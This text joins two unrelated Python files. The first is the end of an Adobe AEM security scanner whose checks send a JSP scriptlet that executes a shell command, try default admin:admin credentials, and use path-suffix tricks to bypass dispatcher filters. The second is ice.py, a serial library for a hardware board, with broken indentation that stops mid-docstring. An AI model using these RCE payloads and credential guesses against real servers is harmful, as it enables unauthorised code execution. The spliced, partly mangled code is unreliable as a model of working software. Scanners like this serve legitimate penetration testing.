    GROOVYAUDIT = itertools.product(('/bin/groovyconsole/audit.servlet', '///bin///groovyconsole///audit.servlet'),
                                    ('', '.css', '.js', '.html', '.ico', '.png', '.json', '.1.json', '...4.2.1...json',
                                     ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico'))
    GROOVYAUDIT = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GROOVYAUDIT)
    results = []
    for path in itertools.chain(GROOVYSCRIPT1, GROOVYSCRIPT2):
        url = normalize_url(base_url, path)
        data = 'script={}'.format(SCRIPT)
        headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
        try:
            resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
            f = Finding('GroovyConsole', url, 'Groovy console is exposed, RCE is possible. '
                                             'See - https://github.com/OlsonDigital/aem-groovy-console')
            if resp.status_code == 200:
                # Two acceptance paths: the HTML response contains
                # 'executionResult', or the response is JSON with an 'output' key.
                if 'executionResult' in str(resp.content):
                    results.append(f)
                    break
                try:
                    json.loads(resp.content.decode())['output']
                except:
                    pass
                else:
                    # JSON parsed and has 'output' - console executed the script.
                    results.append(f)
                    break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_groovy_console', url=url)
    for path in GROOVYAUDIT:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)
            if resp.status_code == 200:
                try:
                    json.loads(resp.content.decode())['data']
                except:
                    pass
                else:
                    # Audit JSON with a 'data' key means the console is reachable.
                    f = Finding('GroovyConsole', url, 'Groovy console is exposed. '
                                                     'See - https://github.com/OlsonDigital/aem-groovy-console')
                    results.append(f)
                    break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_groovy_console', url=url)
    return results
@register('acs_tools')
def exposed_acs_tools(base_url, my_host, debug=False, proxy=None):
    # Checks for exposed ACS AEM Tools: the AEM Fiddle RCE endpoint (tried
    # with default admin:admin credentials) and the QE predicates servlet.
    # Returns a list of Finding objects; empty when nothing is exposed.
    r = random_string(3)
    # URL-encoded JSP scriptlet that executes `echo abcdef31337`; seeing that
    # marker in the response body proves remote code execution.
    DATA = 'scriptdata=%0A%3C%25%40+page+import%3D%22java.io.*%22+%25%3E%0A%3C%25+%0A%09Process+proc+%3D+Runtime.getRuntime().exec(%22echo+abcdef31337%22)%3B%0A%09%0A%09BufferedReader+stdInput+%3D+new+BufferedReader(new+InputStreamReader(proc.getInputStream()))%3B%0A%09StringBuilder+sb+%3D+new+StringBuilder()%3B%0A%09String+s+%3D+null%3B%0A%09while+((s+%3D+stdInput.readLine())+!%3D+null)+%7B%0A%09%09sb.append(s+%2B+%22%5C%5C%5C%5Cn%22)%3B%0A%09%7D%0A%09%0A%09String+output+%3D+sb.toString()%3B%0A%25%3E%0A%3C%25%3Doutput+%25%3E&scriptext=jsp&resource='
    # Cartesian product of fiddle endpoint paths x dispatcher-bypass suffixes
    # (extra extensions / ...4.2.1... selectors defeat naive path filters).
    FIDDLE = itertools.product(
        ('/etc/acs-tools/aem-fiddle/_jcr_content.run.html', '/etc/acs-tools/aem-fiddle/_jcr_content.run...4.2.1...html'),
        ('', '/{0}.css', '/{0}.ico', '/a.png', '/{0}.json', '/{0}.1.json', '?{0}.css', '?{0}.ico'))
    FIDDLE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in FIDDLE)
    PREDICATES = ('/bin/acs-tools/qe/predicates.json',)
    results = []
    for path in FIDDLE:
        url = normalize_url(base_url, path)
        # 'YWRtaW46YWRtaW4=' is base64 for the default credentials admin:admin.
        headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url, 'Authorization': 'Basic YWRtaW46YWRtaW4='}
        try:
            resp = http_request(url, 'POST', data=DATA, additional_headers=headers, proxy=proxy, debug=debug)
            if resp.status_code == 200 and 'abcdef31337' in str(resp.content):
                f = Finding('ACSTools', url, 'ACS Tools Fiddle is exposed, RCE is possible. '
                            'See - https://adobe-consulting-services.github.io/acs-aem-tools/')
                results.append(f)
                # One confirmed hit is enough; stop probing path variants.
                break
        except:  # noqa: E722 -- best-effort probing, matches this file's style
            if debug:
                error('Exception while performing a check', check='exposed_acs_tools', url=url)
    for path in PREDICATES:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)
            # 'relativedaterange' is a predicate name this servlet is known to emit.
            if resp.status_code == 200 and 'relativedaterange' in str(resp.content):
                f = Finding('ACSTools', url, 'ACS Tools predicates. '
                            'See - https://adobe-consulting-services.github.io/acs-aem-tools/')
                results.append(f)
                break
        except:  # noqa: E722
            if debug:
                error('Exception while performing a check', check='exposed_acs_tools', url=url)
    return results
def parse_args():
    """Build the CLI and parse sys.argv[1:] into an argparse.Namespace."""
    cli = argparse.ArgumentParser(
        description='AEM hacker by @0ang3el, see the slides - '
                    'https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps')
    # (flag strings, add_argument keyword options) -- declared data-first so
    # the option surface is easy to scan.
    flag_specs = (
        (('-u', '--url'), dict(help='url to scan')),
        (('--proxy',), dict(help='http and https proxy')),
        (('--debug',), dict(action='store_true', help='debug output')),
        (('--host',), dict(help='hostname or IP to use for back connections during SSRF detection')),
        (('--port',), dict(type=int, default=80, help='opens port for SSRF detection')),
        (('--workers',), dict(type=int, default=3, help='number of parallel workers')),
        (('-H', '--header'), dict(nargs='*', help='extra http headers to attach')),
        (('--handler',), dict(action='append', help='run specific handlers, if omitted run all handlers')),
        (('--listhandlers',), dict(action='store_true', help='list available handlers')),
    )
    for flags, options in flag_specs:
        cli.add_argument(*flags, **options)
    return cli.parse_args(sys.argv[1:])
def run_detector(port): # Run SSRF detector in separate thread
    # Starts an HTTPServer on the given port whose handler (Detector) records
    # incoming back-connections via the module globals `token` and `d`.
    # The server runs on a daemon thread; the HTTPServer instance is returned
    # so the caller can shutdown() it when scanning finishes.
    global token, d
    handler = lambda *args: Detector(token, d, *args)
    httpd = HTTPServer(('', port), handler)
    t = Thread(target=httpd.serve_forever)
    t.daemon = True  # do not block interpreter exit
    t.start()
    return httpd
def main():
    """CLI entry point: parse args, start the SSRF detector, run the selected
    checks in a thread pool, and print every Finding they return."""
    global extra_headers
    args = parse_args()
    if args.listhandlers:
        print('[*] Available handlers: {0}'.format(list(registered.keys())))
        sys.exit(1337)
    if args.proxy:
        p = args.proxy
        proxy = {'http': p, 'https': p}
    else:
        proxy = {}
    if args.header:
        for header in args.header:
            # Split on the FIRST ':' only -- header values such as
            # "Referer: http://x" legitimately contain colons.
            # (bugfix: a plain split(':') truncated such values and an
            # argument without any colon crashed with IndexError.)
            name, sep, value = header.partition(':')
            if not sep:
                print('Ignoring malformed header (expected "Name: value"): {0}'.format(header))
                continue
            extra_headers[name.strip()] = value.strip()
    else:
        extra_headers = {}
    if not args.url:
        print('You must specify the -u parameter, bye.')
        sys.exit(1337)
    if not args.host:
        print('You must specify the --host parameter, bye.')
        sys.exit(1337)
    if not preflight(args.url, proxy):
        print('Seems that you provided bad URL. Try another one, bye.')
        sys.exit(1337)
    httpd = run_detector(args.port)
    # Default to every registered check; narrow to --handler names if given.
    handlers_to_run = registered.values()
    if args.handler:
        handlers_to_run = []
        for name in args.handler:
            handler_func = registered.get(name)
            if handler_func:
                handlers_to_run.append(handler_func)
    with concurrent.futures.ThreadPoolExecutor(args.workers) as tpe:
        futures = []
        for check in handlers_to_run:
            my_host = '{0}:{1}'.format(args.host, args.port)
            futures.append(tpe.submit(check, args.url, my_host, args.debug, proxy))
        for future in concurrent.futures.as_completed(futures):
            for finding in future.result():
                print('[+] New Finding!!!')
                print('\tName: {}'.format(finding.name))
                print('\tUrl: {}'.format(finding.url))
                print('\tDescription: {}\n\n'.format(finding.description))
    httpd.shutdown()
if __name__ == '__main__':
    # Script entry point.
    main()
|
ice.py | #!/usr/bin/env python
################################################################################
import sys
import errno
import socket
import struct
import time
from copy import copy
import functools
import m3_logging
logger = m3_logging.get_logger(__name__)
logger.debug('Got ice.py logger')
try:
import threading
import queue
except ImportError:
logger.warn("Your python installation does not support threads.")
logger.warn("")
logger.warn("Please install a version of python that supports threading.")
raise
try:
import serial
except ImportError:
logger.warn("You do not have the pyserial library installed.")
logger.warn("")
logger.warn("For debian-based systems (e.g. Ubuntu):")
logger.warn("\tsudo apt-get install pyserial")
logger.warn("For rpm-based systems (e.g. Red Hat):")
logger.warn("\tsudo yum install pyserial")
logger.warn("For more installation instructions + see:")
logger.warn("\thttp://pyserial.sourceforge.net/pyserial.html#installation")
raise
################################################################################
class ICE(object):
# (major, minor) protocol versions this library can negotiate, in order.
VERSIONS = ((0,1),(0,2),(0,3))
# Effectively-infinite timeout (seconds) for blocking queue reads.
ONEYEAR = 365 * 24 * 60 * 60

class ICE_Error(Exception):
    '''
    A base class for all exceptions raised by this module
    '''
    pass

class FormatError(ICE_Error):
    '''
    Something in the ICE protocol communicating with the board went wrong.

    This error should never be encountered in normal use.
    '''
    pass

class ParameterError(ICE_Error):
    '''
    An illegal parameter was passed.

    This may be raised by the ICE library if it can determine in advance
    that the request is illegal (e.g. out of range), or by the ICE board if
    the board rejects the desired setting (e.g. not configurable)
    '''

class NAK_Error(ICE_Error):
    '''
    Raised when an unexpected NAK is returned
    '''
    pass

class VersionError(ICE_Error):
    '''
    A method was called that the attached ICE version does not support.
    '''
    def __init__(self, required_version, current_version):
        # Minor version required by the call vs. the negotiated minor.
        self.required_version = required_version
        self.current_version = current_version
        super(ICE.VersionError, self).__init__()

class CapabilityError(ICE_Error):
    '''
    A method was called that the attached ICE board does not have hardware
    frontend for.
    '''
    def __init__(self, required_capability, capabilities):
        # Capability character required vs. the set the board reported.
        self.required_capability = required_capability
        self.capabilities = capabilities
        super(ICE.CapabilityError, self).__init__()
## Support decorators:
def min_proto_version(version):
    '''
    Decorator for library calls that verifies the requested call is
    supported by the protocol version negotiated by the current ICE board.
    '''
    def decorator(fn):
        @functools.wraps(fn)
        def guarded(self, *args, **kwargs):
            # A missing `minor` attribute means negotiate_version never ran.
            if not hasattr(self, "minor"):
                raise self.ICE_Error("ICE must be connected first ({})".format(fn))
            major, minor = (int(part) for part in version.split('.'))
            if major != 0:
                raise self.ICE_Error("Major version bump?")
            if self.minor < minor:
                raise self.VersionError(minor, self.minor)
            return fn(self, *args, **kwargs)
        return guarded
    return decorator
def max_proto_version(version):
    '''
    Decorator for library calls that verifies the requested call is
    supported by the protocol version negotiated by the current ICE board.
    '''
    def decorator(fn):
        @functools.wraps(fn)
        def guarded(self, *args, **kwargs):
            # A missing `minor` attribute means negotiate_version never ran.
            if not hasattr(self, "minor"):
                raise self.ICE_Error("ICE must be connected first")
            major, minor = (int(part) for part in version.split('.'))
            if major != 0:
                raise self.ICE_Error("Major version bump?")
            if self.minor > minor:
                raise self.VersionError(minor, self.minor)
            return fn(self, *args, **kwargs)
        return guarded
    return decorator
def capability(cap):
    '''
    Decorator for library calls that verifies the requested call is
    supported by the capabilities reported by the current ICE board.
    '''
    def wrapped_fn_factory(fn_being_decorated):
        @functools.wraps(fn_being_decorated)
        def wrapped_fn(self, *args, **kwargs):
            try:
                if cap not in self.capabilities:
                    raise self.CapabilityError(cap, self.capabilities)
            except AttributeError:
                # self.capabilities only exists after ice_query_capabilities
                # has run (protocol >= 0.2).  The query itself must be let
                # through, and v0.1 boards never report capabilities at all.
                # NOTE(review): original indentation was lost upstream; the
                # placement of this `raise` (inside the minor!=1 branch) is
                # reconstructed -- confirm against the upstream repository.
                if 'ice_query_capabilities' not in fn_being_decorated.__name__:
                    if self.minor != 1:
                        logger.error("Version decorator must precede capability")
                        raise
            return fn_being_decorated(self, *args, **kwargs)
        return wrapped_fn
    return wrapped_fn_factory
def __init__(self):
    '''
    An ICE object.

    Most methods are not usable until connect() has been called.
    '''
    # Rolling message id (wraps at 256) stamped onto outgoing packets.
    self.event_id = 0
    self.last_event_id = -1
    # Depth-1 queue that hands ACK/NAK responses from the reader thread
    # back to the blocked synchronous sender (send_message).
    self.sync_queue = queue.Queue(1)
    # Dispatch table: message-type character -> handler callable.
    self.msg_handler = {}
    # Reassembly state for fragmented I2C ('d') messages.
    self.d_lock = threading.Lock()
    self.d_frag = ''
    self.msg_handler['d'] = self.d_defragger
    # Reassembly state for fragmented MBus ('b') messages.
    self.b_lock = threading.Lock()
    self.b_frag = ''
    self.msg_handler['b'] = self.b_defragger
    # Reassembly state for snooped MBus ('B') messages.
    self.B_lock = threading.Lock()
    self.B_frag = ''
    self.msg_handler['B'] = self.B_defragger
    # When True, B_formatter forwards only ACK'd snooped messages.
    self.B_formatter_success_only = False
    self.msg_handler['B+'] = self.B_formatter
    self.msg_handler['b+'] = self.b_formatter
    # -1: unknown, 0: EIN frontend selected, 1: GOC frontend selected.
    self.goc_ein_toggle = -1
def connect(self, serial_device, baudrate=115200):
    '''
    Opens a connection to the ICE board.

    The ICE object configuration (e.g. message handlers) cannot be safely
    changed after this method is invoked.
    '''
    # timeout=.1 keeps reads short so the communicator thread can poll its
    # stop flag (see communicator()).
    self.dev = serial.Serial(serial_device, baudrate, timeout=.1)
    if self.dev.isOpen():
        logger.info("Connected to serial device at " + self.dev.portstr)
    else:
        raise self.ICE_Error("Failed to connect to serial device")
    # Background reader thread plus the request/response events used to
    # stop it cleanly in destroy().
    self.communicator_stop_request = threading.Event()
    self.communicator_stop_response = threading.Event()
    self.comm_thread = threading.Thread(target=self.communicator)
    self.comm_thread.daemon = True
    self.comm_thread.start()
    self.negotiate_version()
    if self.minor == 2:
        # V2 ICE sets GOC on by default, which is annoying. Correct that.
        self.goc_set_onoff(False)
def is_connected(self):
    """Report whether connect() has been called (a serial handle exists)."""
    connected = hasattr(self, 'dev')
    return connected
def destroy(self):
    # Tear down the serial link: request the communicator thread to stop,
    # wait for it to acknowledge, close the port, and drop self.dev so
    # is_connected() becomes False.  Safe to call when never connected.
    if hasattr(self, 'dev'):
        self.communicator_stop_request.set()
        self.communicator_stop_response.wait()  # reader loop has fully exited
        self.dev.close()
        logger.info("Connection to " + self.dev.portstr + " closed.")
        del(self.dev)
def spawn_handler(self, msg_type, event_id, length, msg):
    # Dispatch one received message to the handler registered for its type.
    # Despite the name, the handler now runs inline; the per-message thread
    # version is kept below, commented out.
    try:
        handler = self.msg_handler[msg_type]
        #t = threading.Thread(target=self.msg_handler[msg_type],
        #                     args=(msg_type, event_id, length, msg))
        #t.daemon = True
        #t.start()
    except KeyError:
        # Unknown type: log-and-drop; never let a bad packet kill the reader.
        try:
            logger.warn("WARNING: No handler registered for message type: " +
                    str(msg_type))
            logger.warn("Known Types:")
            for t,f in self.msg_handler.items():
                logger.warn("%s\t%s" % (t, str(f)))
            logger.warn(" Dropping packet:")
            logger.warn("")
            logger.warn(" Type: %s" % (msg_type))
            logger.warn("Event ID: %d" % (event_id))
            logger.warn(" Length: %d" % (length))
            # NOTE(review): str.encode('hex') is Python-2-only; this line
            # would raise on Python 3 -- confirm the target interpreter.
            logger.warn(" Message:" + msg.encode('hex'))
        except Exception as e:
            # Even the error report is best-effort.
            logger.warn("Unhandled exception trying to report unknown message.")
            logger.warn(str(e))
            logger.warn("Suppressed.")
        return
    handler(msg_type, event_id, length, msg)
def useful_read(self, length):
    """Block until exactly `length` bytes arrive from the serial device.

    The port is opened with a short timeout, so individual reads may come
    back short; keep reading the remainder until the count is satisfied.
    """
    buf = self.dev.read(length)
    remaining = length - len(buf)
    while remaining > 0:
        buf += self.dev.read(remaining)
        remaining = length - len(buf)
    assert len(buf) == length
    return buf
def communicator(self):
    # Reader loop, run on its own daemon thread.  Wire frames are three
    # header bytes (type, event_id, length) followed by `length` payload
    # bytes.  ACK/NAK (types 0/1) complete a pending synchronous send via
    # sync_queue; everything else is dispatched through spawn_handler.
    while not self.communicator_stop_request.isSet():
        try:
            # Read has a timeout of .1 s. Polling is the easiest way to
            # do x-platform cancellation
            msg_type, event_id, length = self.useful_read(3)
        except ValueError:
            continue
        except (serial.SerialException, OSError):
            # Port vanished (unplug / close) -- leave the loop.
            break
        # NOTE(review): ord() here is a Python-2 idiom -- on Python 3 the
        # 3-byte unpack above already yields ints and ord() would raise.
        # Confirm the intended interpreter before changing.
        msg_type = ord(msg_type)
        event_id = ord(event_id)
        length = ord(length)
        #print("Got msg type", msg_type, chr(msg_type), length)
        msg = self.useful_read(length)
        #print(msg.encode('hex'))
        if event_id == self.last_event_id:
            # Duplicate frame: drop rather than double-dispatch.
            logger.warn("WARNING: Duplicate event_id! THIS IS A BUG [somewhere]!!")
            logger.warn(" Dropping packet:")
            logger.warn("")
            logger.warn(" Type: %d" % (msg_type))
            logger.warn("Event ID: %d" % (event_id))
            logger.warn(" Length: %d" % (length))
            logger.warn(" Message:" + msg.encode('hex'))
        else:
            self.last_event_id = event_id
            if msg_type in (0,1):
                # Ack / Nack response from a synchronous message
                try:
                    if msg_type == 0:
                        logger.debug("Got an ACK packet. Event: " + str(event_id))
                    else:
                        logger.info("Got a NAK packet. Event:" + str(event_id))
                    self.sync_queue.put((msg_type, msg))
                except queue.Full:
                    logger.warn("WARNING: Synchronization lost. Unsolicited ACK/NAK.")
                    logger.warn(" Dropping packet:")
                    logger.warn("")
                    logger.warn(" Type: %s" % (["ACK","NAK"][msg_type]))
                    logger.warn("Event ID: %d" % (event_id))
                    logger.warn(" Length: %d" % (length))
                    logger.warn(" Message:" + msg.encode('hex'))
            else:
                # Asynchronous traffic: dispatch by type character.
                msg_type = chr(msg_type)
                logger.debug("Got an async message of type: " + msg_type)
                self.spawn_handler(msg_type, event_id, length, msg)
    # Signal destroy() that the loop has fully exited.
    self.communicator_stop_response.set()
    if hasattr(self, 'on_disconnect'):
        self.on_disconnect()
def string_to_masks(self, mask_string):
    """Convert a bit-pattern string of '1'/'0'/'x' (spaces ignored) to masks.

    Returns (ones, zeros): bit i of `ones` is set where character i
    (counting from the right) is '1', bit i of `zeros` where it is '0'.
    'x'/'X' positions are don't-cares and appear in neither mask.
    Raises FormatError on any other character.
    """
    ones = 0
    zeros = 0
    for bit, ch in enumerate(reversed(mask_string.replace(' ', ''))):
        if ch == '1':
            ones |= (1 << bit)
        elif ch == '0':
            zeros |= (1 << bit)
        elif ch not in ('x', 'X'):
            raise self.FormatError("Illegal character: >>>" + ch + "<<<")
    return ones, zeros
def masks_to_strings(self, ones, zeros, length):
    """Render two bitmasks back into a `length`-character pattern string.

    Inverse of string_to_masks: '1' where `ones` has a bit set, '0' where
    `zeros` does, 'x' where neither.  A bit set in both masks is
    contradictory and raises FormatError.
    """
    chars = []
    for bit in range(length):
        want_one = bool(ones & (1 << bit))
        want_zero = bool(zeros & (1 << bit))
        if want_one and want_zero:
            raise self.FormatError("masks_to_strings has req 1 and req 0?")
        if want_one:
            chars.append('1')
        elif want_zero:
            chars.append('0')
        else:
            chars.append('x')
    return ''.join(reversed(chars))
def d_defragger(self, msg_type, event_id, length, msg):
    '''
    Helper function to defragment 'd' type I2C messages before forwarding.

    This helper is installed by default for 'd' messages. It will attempt to
    call a helper registered under the name 'd+' when a complete message has
    been received. The message will be assigned the event id of the last
    received fragment.

    It may be safely overridden.
    '''
    with self.d_lock:
        assert msg_type == 'd'
        self.d_frag += msg
        # A maximal 255-byte payload means "more fragments follow";
        # anything shorter terminates the message.
        # XXX: Make version dependent
        if length != 255:
            sys.stdout.flush()
            logger.debug("Got a complete I2C transaction of length %d bytes. Forwarding..." % (len(self.d_frag)))
            sys.stdout.flush()
            # copy() so handlers cannot mutate our reassembly buffer.
            self.spawn_handler('d+', event_id, len(self.d_frag), copy(self.d_frag))
            self.d_frag = ''
        else:
            logger.debug("Got an I2C fragment... thus far %d bytes received:" % (len(self.d_frag)))
@min_proto_version("0.2")
def b_defragger(self, msg_type, event_id, length, msg):
    '''
    Helper function to defragment 'b' type MBus messages before forwarding.

    This helper is installed by default for 'b' messages. It will attempt to
    call a helper registered under the name 'b+' when a complete message has
    been received. The message will be assigned the event id of the last
    received fragment.

    It may be safely overridden.
    '''
    with self.b_lock:
        logger.debug("\tmsg_type: %s, event_id: %s, length: %s, msg: %s"
                % (msg_type, event_id, length, repr(msg)))
        assert msg_type == 'b'
        self.b_frag += msg
        # A maximal 255-byte fragment implies more to come; shorter ends it.
        # XXX: Make version dependent
        if length != 255:
            logger.debug("Got a complete MBus message of length %d bytes. Forwarding..." % (len(self.b_frag)))
            # copy() so handlers cannot mutate our reassembly buffer.
            self.spawn_handler('b+', event_id, len(self.b_frag), copy(self.b_frag))
            self.b_frag = ''
        else:
            logger.debug("Got a MBus fragment... thus far %d bytes received:" % (len(self.b_frag)))
@min_proto_version("0.2")
def B_defragger(self, msg_type, event_id, length, msg):
    '''
    Helper function to defragment 'B' type snooped MBus messages before forwarding.

    This helper is installed by default for 'B' messages. It will attempt to
    call a helper registered under the name 'B+' when a complete message has
    been received. The message will be assigned the event id of the last
    received fragment.

    It may be safely overridden.
    '''
    with self.B_lock:
        assert msg_type == 'B'
        self.B_frag += msg
        # A maximal 255-byte fragment implies more to come; shorter ends it.
        # XXX: Make version dependent
        if length != 255:
            sys.stdout.flush()
            logger.debug("Got a complete snooped MBus message. Length %d bytes. Forwarding..." % (len(self.B_frag)))
            sys.stdout.flush()
            # copy() so handlers cannot mutate our reassembly buffer.
            self.spawn_handler('B+', event_id, len(self.B_frag), copy(self.B_frag))
            self.B_frag = ''
        else:
            logger.debug("Got a snoop MBus fragment... thus far %d bytes received:" % (len(self.B_frag)))
@min_proto_version("0.2")
def B_formatter(self, msg_type, event_id, length, msg):
    # Thin shim: route complete snooped-MBus ('B+') messages into the shared
    # parser, which forwards to any handler registered under 'B++'.
    return self.common_bB_formatter(msg_type, event_id, length, msg, 'B++')

@min_proto_version("0.2")
def b_formatter(self, msg_type, event_id, length, msg):
    # Thin shim: route complete MBus ('b+') messages into the shared parser
    # ('b++' handler key).
    return self.common_bB_formatter(msg_type, event_id, length, msg, 'b++')
@min_proto_version("0.2")
def common_bB_formatter(self, msg_type, event_id, length, msg, b_type):
    '''
    Helper function that parses 'B+' snooped MBus messages before forwarding.

    This helper is installed by default for 'B+' messages. It will attempt
    to call a helper registered under the name 'B++' when a complete message
    has been received. B++ messages do not have the standard signature,
    instead they expect a callback of the form:

       Bpp_callback(address, data, control_bit_0, control_bit_1)
    or
       Bpp_callback(address, data)

    If the second form is used, the member variable
    "B_formatter_success_only" (default False) controls whether all messages
    are forwarded or only messages that were ACK'd.

    This function may be safely overridden.
    '''
    # Wire layout: 4 address bytes, payload, then one control/status byte.
    addr = msg[0:4]
    data = msg[4:-1]
    cb = ord(msg[-1:])
    # status_bits <= `SD status_bits | {4'b0000, mbus_rxfail, mbus_rxbcast, ice_export_control_bits};
    cb0 = bool(cb & 0x1)
    cb1 = bool(cb & 0x2)
    success = cb0 & (~cb1) # XXX Something is wrong here [also fix default]
    try:
        handler = self.msg_handler[b_type]
    except KeyError:
        # No consumer registered: log-and-drop, best-effort.
        logger.warn("All registered handlers: {}".format(self.msg_handler))
        logger.warn("Looking up key >>{}<<".format(b_type))
        try:
            logger.warn("No handler registered for B++ (formatted, snooped MBus) messages")
            logger.warn("Dropping message:")
            # NOTE(review): str.decode('hex') is Python-2-only, and `cb` is
            # an int with no .decode at all -- these report lines appear to
            # be legacy/dead and would raise; the inner except suppresses it.
            logger.warn("\taddr: " + addr.decode('hex'))
            logger.warn("\tdata: " + data.decode('hex'))
            logger.warn("\tstat: " + cb.decode('hex'))
            logger.warn("")
        except Exception as e:
            logger.warn("Unhandled exception trying to report missing B++ handler.")
            logger.warn(str(e))
            logger.warn("Suppressed.")
        return
    #except TypeError:
    #    logger.debug("Type error")
    #    if not self.B_formatter_success_only or (success):
    #        self.msg_handler[b_type](addr, data)
    #    else:
    #        logger.debug("no call")
    # Two-argument callback form; control bits are currently not forwarded.
    handler(addr, data)
def send_message(self, msg_type, msg='', length=None):
    # Synchronously send one framed packet (type, event id, length, payload)
    # and block until the communicator thread delivers the matching ACK/NAK.
    # Returns (ack, payload) where ack is 0 for ACK and 1 for NAK.
    if len(msg_type) != 1:
        raise self.FormatError("msg_type must be exactly 1 character")
    if len(msg) > 255:
        raise self.FormatError("msg too long. Maximum msg is 255 bytes")
    if length is None:
        length = len(msg)
    buf = struct.pack("BBB", ord(msg_type), self.event_id, length)
    self.event_id = (self.event_id + 1) % 256  # event ids wrap at one byte
    # NOTE(review): .encode('hex') is Python-2-only and buf (bytes) + msg
    # (possibly str) would also fail on Python 3 -- confirm interpreter.
    logger.debug('Sending %s', (buf+msg).encode('hex'))
    self.dev.write(buf + msg)
    # Ugly hack so python allows keyboard interrupts
    return self.sync_queue.get(True, self.ONEYEAR)
def send_message_until_acked(self, msg_type, msg='', length=None, tries=5):
    """Send a synchronous message, retrying on NAK up to `tries` times.

    Returns the ACK payload on success; raises NAK_Error once the retry
    budget is exhausted.

    NOTE(review): on a NAK, `msg` is rebound to the NAK response body, so
    any retry resends that body rather than the original message -- looks
    unintended, but the behavior is preserved here; confirm before fixing.
    """
    attempts_left = tries
    while attempts_left:
        ack, msg = self.send_message(msg_type, msg, length)
        if ack == 0:
            return msg
        attempts_left -= 1
    raise self.NAK_Error
def negotiate_version(self):
    '''
    Establish communication with an ICE board.

    This function is called automatically by __init__ and should not be
    called directly. For ICE versions >= 0.2, this function automatically
    calls ice_query_capabilities and sets up the ICE library appropriately.
    '''
    logger.info("This library supports versions...")
    for major, minor in ICE.VERSIONS:
        logger.info("\t%d.%d" % (major, minor))
    logger.debug("Sending version probe")
    resp = self.send_message_until_acked('V')
    # The response is a flat list of (major, minor) byte pairs, so it must
    # be non-empty and of even length.  (bugfix: was `len(resp) is 0` --
    # identity comparison with an int literal is not a reliable equality
    # test and raises SyntaxWarning on modern Pythons.  str(resp) also
    # avoids a bytes+str TypeError on the error path.)
    if len(resp) == 0 or len(resp) % 2:
        raise self.FormatError("Version response: " + str(resp))
    logger.info("This ICE board supports versions...")
    self.major = None
    self.minor = None
    # Choose the first board-advertised version this library also supports.
    while len(resp) > 0:
        major, minor = struct.unpack("BB", resp[:2])
        resp = resp[2:]
        if self.major is None and (major, minor) in ICE.VERSIONS:
            self.major = major
            self.minor = minor
            logger.info("\t%d.%d **Chosen version" % (major, minor))
        else:
            logger.info("\t%d.%d" % (major, minor))
    if self.major is None:
        logger.warn("No versions in common. Version negotiation failed.")
        raise self.ICE_Error
    if self.major != 0:
        logger.error("Major version number bump. Need to re-examine python versioning")
        raise self.ICE_Error
    # Confirm the chosen version with the board.
    self.send_message_until_acked('v', struct.pack("BB", self.major, self.minor))
    if self.minor >= 2:
        logger.debug("ICE version supports capabilities, querying")
        self.ice_query_capabilities()
        # str() so this logs whether capabilities is str or bytes (bugfix:
        # bytes concatenated with a str raised TypeError here).
        logger.debug("Capabilities: " + str(self.capabilities))
    else:
        logger.debug("Version 0.1 does not have capability support, skipping")
def min_version(self, required_version):
    # Runtime guard (pre-decorator style): raise VersionError unless the
    # negotiated protocol minor is >= required_version, given as e.g. 0.2.
    if required_version > 1:
        logger.error("Need to fix this versioning system. Major version number bumped")
        raise self.ICE_Error
    # 0.x -> integer minor (0.2 -> 2); exact for the one-decimal versions
    # this library uses.
    required_version = int(required_version * 10)
    try:
        if self.minor < required_version:
            raise self.VersionError(required_version, self.minor)
    except AttributeError:
        # self.minor only exists after negotiate_version has run.
        logger.error("Attempt to call method before version negotiation?")
        raise
def _fragment_sender(self, msg_type, msg):
    '''
    Internal. (helper for {i2c,goc,ein,mbus}_send)

    Splits `msg` into <=255-byte frames (the protocol's one-byte length
    limit) and sends them until done or until the board NAKs.  Returns the
    number of bytes the board actually accepted.
    '''
    # XXX: Make version dependent?
    FRAG_SIZE = 255
    sent = 0
    logger.debug("Sending %d byte message (in %d byte fragments)" % (len(msg), FRAG_SIZE))
    while len(msg) >= FRAG_SIZE:
        ack,resp = self.send_message(msg_type, msg[0:FRAG_SIZE])
        if ack == 1: # (NAK)
            # The NAK payload, when present, is the count the board accepted
            # from this fragment.
            if len(resp) == 0:
                logger.warning("ICE NAK'd request to send with no length sent field, assuming 0")
                return sent + 0
            return sent + ord(resp)
        msg = msg[FRAG_SIZE:]
        sent += FRAG_SIZE
        logger.debug("\tSent %d byte s, %d remaining" % (sent, len(msg)))
    logger.debug("Sending last message fragment, %d bytes long" % (len(msg)))
    ack,resp = self.send_message(msg_type, msg)
    if ack == 1:
        if len(resp) == 0:
            logger.warning("ICE NAK'd request to send with no length sent field, assuming 0")
            return sent + 0
        return sent + ord(resp)
    sent += len(msg)
    return sent
## QUERY / CONFIGURE ICE ##
@min_proto_version("0.2")
@capability('?')
def ice_query_capabilities(self):
    '''
    Queries ICE board for available hardware frontends.

    The ICE library will be configured to raise an ICE.CapabilityError
    if a request that is unsupported by this hardware is requested.

    This interface is very raw and needs to be wrapped in something more
    user-friendly and library-esque. It currently returns the raw array of
    characters from the ICE board, which requires the caller to know the
    ICE protocol.
    '''
    resp = self.send_message_until_acked('?', struct.pack("B", ord('?')))
    # Cached so the @capability decorator can consult it on later calls.
    self.capabilities = resp
    return resp
@min_proto_version("0.2")
@capability('?')
def ice_get_baudrate(self):
    '''
    Gets the current baud rate of the ICE bridge in Hz.

    XXX: Returns the ideal value, not the exact speed. Not sure which is
    more correct / more useful.
    '''
    self.min_version(0.2)
    resp = self.send_message_until_acked('?', struct.pack("B", ord('b')))
    div = struct.unpack("!H", resp)[0]
    if div == 0x00AE:
        # Divider 0x00AE is the 115200-baud setting -- see
        # ice_set_baudrate_to_115200.  (bugfix: previously returned
        # 1152200, an extra-digit typo.)
        return 115200
    elif div == 0x0007:
        return 3000000
    else:
        raise self.FormatError("Unknown baud divider?")
@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate(self, div, baudrate):
    '''
    Sets a new baud rate for the ICE bridge.

